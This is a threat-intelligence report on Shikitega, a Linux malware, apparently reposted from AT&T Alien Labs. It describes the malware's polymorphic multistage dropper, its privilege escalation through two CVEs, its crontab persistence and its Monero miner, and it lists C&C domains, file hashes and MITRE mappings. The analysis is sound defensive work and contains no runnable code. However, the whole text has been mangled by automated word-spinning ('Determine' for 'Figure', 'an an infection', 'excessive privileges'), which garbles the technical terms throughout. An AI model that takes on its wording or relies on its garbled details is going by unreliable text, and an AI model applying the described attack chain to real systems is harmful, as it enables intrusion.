Govt abstract
AT&T Alien Labs has found a brand new malware focusing on endpoints and IoT units which might be operating Linux working methods. Shikitega is delivered in a multistage an infection chain the place every module responds to part of the payload and downloads and executes the following one. An attacker can achieve full management of the system, along with the cryptocurrency miner that will probably be executed and set to persist.
Key takeaways:
- The malware downloads and executes the Metasploit’s “Mettle” meterpreter to maximise its management on contaminated machines.
- Shikitega exploits system vulnerabilities to achieve excessive privileges, persist and execute crypto miner.
- The malware makes use of a polymorphic encoder to make it harder to detect by anti-virus engines.
- Shikitega abuse reputable cloud providers to retailer a few of its command and management servers (C&C).
Determine 1. Shikitega operation course of.
Background
With an increase of almost 650% in malware and ransomware for Linux this yr, reaching an all-time excessive within the first half yr of 2022, risk actors discover servers, endpoints and IoT units based mostly on Linux working methods increasingly invaluable and discover new methods to ship their malicious payloads. New malwares like BotenaGo and EnemyBot are examples of how malware writers quickly incorporate not too long ago found vulnerabilities to search out new victims and improve their attain.
Shikitega makes use of an an infection chain in a number of layers, the place the primary one incorporates only some hundred bytes, and every module is answerable for a selected job, from downloading and executing Metasploit meterpreter, exploiting Linux vulnerabilities, setting persistence within the contaminated machine to downloading and executing a cryptominer.
Evaluation
The principle dropper of the malware is a really small ELF file, the place its complete dimension is round solely 370 bytes, whereas its precise code dimension is round 300 bytes. (determine 2)
Determine 2. Malicious ELF file with a complete of solely 376 bytes.
The malware makes use of the “Shikata Ga Nai” polymorphic XOR additive suggestions encoder, which is without doubt one of the hottest encoders utilized in Metasploit. Utilizing the encoder, the malware runs by a number of decode loops, the place one loop decodes the following layer, till the ultimate shellcode payload is decoded and executed. The encoder stud is generated based mostly on dynamic instruction substitution and dynamic block ordering. As well as, registers are chosen dynamically. Under we are able to see how the encoder decrypts the primary two loops: (figures 3 and 4)
Determine 3. First “Shikata Ga Nai” decryption loop.
Determine 4. Second “Shikata Ga Nai” decryption loop created by the primary one.
After a number of decryption loops, the ultimate payload shellcode will probably be decrypted and executed. Because the malware doesn’t use any imports, it makes use of ‘int 0x80’ to execute the suitable syscall. As the primary dropper code could be very small, the malware will obtain and execute extra instructions from its command and management by calling 102 syscall (sys_socketcall). (Determine 5)
Determine 5. Calling system capabilities utilizing interrupts
The C&C will reply with extra shell instructions to execute, as seen within the packet seize in determine 6. The primary bytes marked in blue are the shell instructions that the malware will execute.
Determine 6. Extra instructions acquired from C&C.
The acquired command will obtain extra information from the server that received’t be saved within the onerous drive, however reasonably will probably be executed from reminiscence solely. (Determine 7)
Determine 7. Executes extra shell code acquired from C&C.
In different malware variations, it’s going to use the “execve” syscall to execute ‘/bin/sh’ with command acquired from the C&C. (determine 8)
Determine 8. Executing shell instructions by utilizing syscall_execve.
The malware downloads and executes ‘Mettle’, a Metasploit meterpreter that permits the attacker to make use of a variety of assaults from webcam management, sniffer, a number of reverse shells (tcp/http..), course of management, execute shell instructions and extra.
As well as the malware will use wget to obtain and execute the following stage dropper.
Subsequent stage dropper
The subsequent downloaded and executed file is an extra small ELF file (round 1kb) encoded with the “Shikata Ga Nai” encoder. The malware decrypts a shell command that will probably be executed by calling syscall_execve with ‘/bin/sh” as a parameter with the decrypted shell. (Determine 9)
Determine 9. Second stage dropper decrypts and executes shell instructions.
The executed shell command will obtain and execute extra information. To execute the following and final stage dropper, it’s going to exploit two linux vulnerabilities to leverage privileges – CVE-2021-4034 and CVE-2021-3493 (determine 10 and 11).
Determine 10. Exploiting Linux vulnerability CVE-2021-3493.
Determine 11. Exploiting CVE-2021-4034 vulnerability.
The malware will leverage the exploit to obtain and execute the ultimate stage with root privileges – persistence and cryptominer payload.
Persistence
To realize persistence, the malware will obtain and execute a complete of 5 shell scripts. It persists within the system by setting 4 crontabs, two for the present logged in consumer and the opposite two for the consumer root. It’ll first verify if the crontab command exists on the machine, and if not, the malware will set up it and begin the crontab service.
To verify just one occasion is operating, it’s going to use the flock command with a lock file “/var/tmp/vm.lock”.
Determine 12. Including root crontab to execute the ultimate payload.
Under is the record of downloaded and executed script to realize persistence:
script title |
particulars |
unix.sh |
Verify if “crontab” instructions exist within the system, if not set up it and begin the crontab service. |
brict.sh |
Provides crontab for present consumer to execute cryptominer. |
politrict.sh |
Provides root crontab to execute cryptominer. |
truct.sh |
Provides crontab for present consumer to obtain cryptominer and config from C&C. |
limit.sh |
Provides root crontab to obtain cryptominer and config from C&C. |
Because the malware persists with crontabs, it’s going to delete all downloaded information from the system to cover its presence.
Cryptominer payload
The malware downloads and executes XMRig miner, a well-liked miner for the Monero cryptocurrency. It’ll additionally set a crontab to obtain and execute the crypto miner and config from the C&C as talked about within the persistence half above.
Determine 13. XMRig miner is downloaded and executed on an contaminated machine.
Command and management
Shikitega makes use of cloud options to host a few of its command and management servers (C&C) as proven by OTX in determine 14. Because the malware in some circumstances contacts the command and management server utilizing straight the IP with out area title, it’s tough to supply a whole record of indicators for detections since they’re unstable and they are going to be used for reputable functions in a brief time frame.
Determine 14. Command and management server hosted on a reputable cloud internet hosting service.
Beneficial actions
- Preserve software program updated with safety updates.
- Set up Antivirus and/or EDR in all endpoints.
- Use a backup system to backup server information.
Conclusion
Menace actors proceed to seek for methods to ship malware in new methods to remain underneath the radar and keep away from detection. Shiketega malware is delivered in a complicated means, it makes use of a polymorphic encoder, and it regularly delivers its payload the place every step reveals solely a part of the whole payload. As well as, the malware abuses recognized internet hosting providers to host its command and management servers. Keep secure!
Related Indicators (IOCs)
The next technical indicators are related to the reported intelligence. A listing of indicators can be obtainable within the OTX Pulse. Please be aware, the heartbeat might embody different actions associated however out of the scope of the report.
TYPE |
INDICATOR |
DESCRIPTION |
DOMAIN |
sprint[.]cloudflare.ovh |
Command and management |
DOMAIN |
principal[.]cloudfronts.web |
Command and management |
SHA256 |
b9db845097bbf1d2e3b2c0a4a7ca93b0dc80a8c9e8dbbc3d09ef77590c13d331 |
Malware hash |
SHA256 |
0233dcf6417ab33b48e7b54878893800d268b9b6e5ca6ad852693174226e3bed |
Malware hash |
SHA256 |
f7f105c0c669771daa6b469de9f99596647759d9dd16d0620be90005992128eb |
Malware hash |
SHA256 |
8462d0d14c4186978715ad5fa90cbb679c8ff7995bcefa6f9e11b16e5ad63732 |
Malware hash |
SHA256 |
d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374 |
Malware hash |
SHA256 |
fc97a8992fa2fe3fd98afddcd03f2fc8f1502dd679a32d1348a9ed5b208c4765 |
Malware hash |
SHA256 |
e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d |
Malware hash |
SHA256 |
cbdd24ff70a363c1ec89708367e141ea2c141479cc4e3881dcd989eec859135d |
Malware hash |
SHA256 |
d5bd2b6b86ce14fbad5442a0211d4cb1d56b6c75f0b3d78ad8b8dd82483ff4f8 |
Malware hash |
SHA256 |
29aafbfd93c96b37866a89841752f29b55badba386840355b682b1853efafcb8 |
Malware hash |
SHA256 |
4ed78c4e90ca692f05189b80ce150f6337d237aaa846e0adf7d8097fcebacfe7 |
Malware hash |
SHA256 |
130888cb6930500cf65fc43522e2836d21529cab9291c8073873ad7a90c1fbc5 |
Malware hash |
SHA256 |
3ce8dfaedb3e87b2f0ad59e1c47b9b6791b99796d38edc3a72286f4b4e5dc098 |
Malware hash |
SHA256 |
6b514e9a30cbb4d6691dd0ebdeec73762a488884eb0f67f8594e07d356e3d275 |
Malware hash |
SHA256 |
7c70716a66db674e56f6e791fb73f6ce62ca1ddd8b8a51c74fc7a4ae6ad1b3ad |
Malware hash |
SHA256 |
2b305939d1069c7490b3539e2855ed7538c1a83eb2baca53e50e7ce1b3a165ab |
Malware hash CVE-2021-3493 |
SHA256 |
4dcae1bddfc3e2cb98eae84e86fb58ec14ea6ef00778ac5974c4ec526d3da31f |
Malware hash CVE-2021-4034 |
SHA256 |
e8e90f02705ecec9e73e3016b8b8fe915873ed0add87923bf4840831f807a4b4 |
Malware hash |
SHA256 |
64a31abd82af27487985a0c0f47946295b125e6d128819d1cbd0f6b62a95d6c4 |
Malware shell script |
SHA256 |
623e7ad399c10f0025fba333a170887d0107bead29b60b07f5e93d26c9124955 |
Malware shell script |
SHA256 |
59f0b03a9ccf8402e6392e07af29e2cfa1f08c0fc862825408dea6d00e3d91af |
Malware shell script |
SHA256 |
9ca4fbfa2018fe334ca8f6519f1305c7fbe795af9eb62e9f58f09e858aab7338 |
Malware shell script |
SHA256 |
05727581a43c61c5b71d959d0390d31985d7e3530c998194670a8d60e953e464 |
Malware shell script |
SHA256 |
ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d |
Malware hash |
Mapped to MITRE ATT&CK
The findings of this report are mapped to the next MITRE ATT&CK Matrix methods:
- TA0002: Execution
- T1059: Command and Scripting Interpreter
- T1569: System Service
- T1569.002: Service Execution
- TA0003: Persistence
- T1543: Create or Modify System Course of
- TA0005: Protection Evasion
- T1027: Obfuscated Information or Info